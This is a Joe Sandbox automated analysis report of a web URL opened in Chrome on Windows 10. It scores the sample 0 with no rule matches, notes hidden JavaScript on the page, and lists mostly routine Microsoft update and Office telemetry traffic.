Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack

Overview

General Information

Sample URL:https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack
Analysis ID:1539803
Infos:

Detection

Score:0
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

HTML page contains hidden javascript code

Classification

  • System is w10x64
  • chrome.exe (PID: 5416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 --field-trial-handle=2020,i,9436422360427185457,16463863993275547798,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6336 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpackHTTP Parser: Base64 decoded: {"a":"ecdd9301baaf4fe3da36652f54c1ec53c5cabdb762333f0f2f36e5265e3a70de380708bfd53ae064adb0b9b71f24a791dd442e32778a85641c936e04289895d975d17a0ba07ef2fa804ef6c157a71ae786b15be5b74d7d8581ccbd04ed1208449c0273a2c39e0bc77446edc4056efdd8338d22071161e507bf6aecb4d...
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: global trafficHTTP traffic detected: GET /d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpack HTTP/1.1Host: t3sp2vzrhieujyp67175b9328f1f.manufect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: t3sp2vzrhieujyp67175b9328f1f.manufect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t3sp2vzrhieujyp67175b9328f1f.manufect.com/d4761486d567859506150/hdQrcEwPXaK/6a6362784e6e4e4b4561&_webpackAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=88KnOsUeSkFa84f&MD=LxyM8EeK HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=88KnOsUeSkFa84f&MD=LxyM8EeK HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
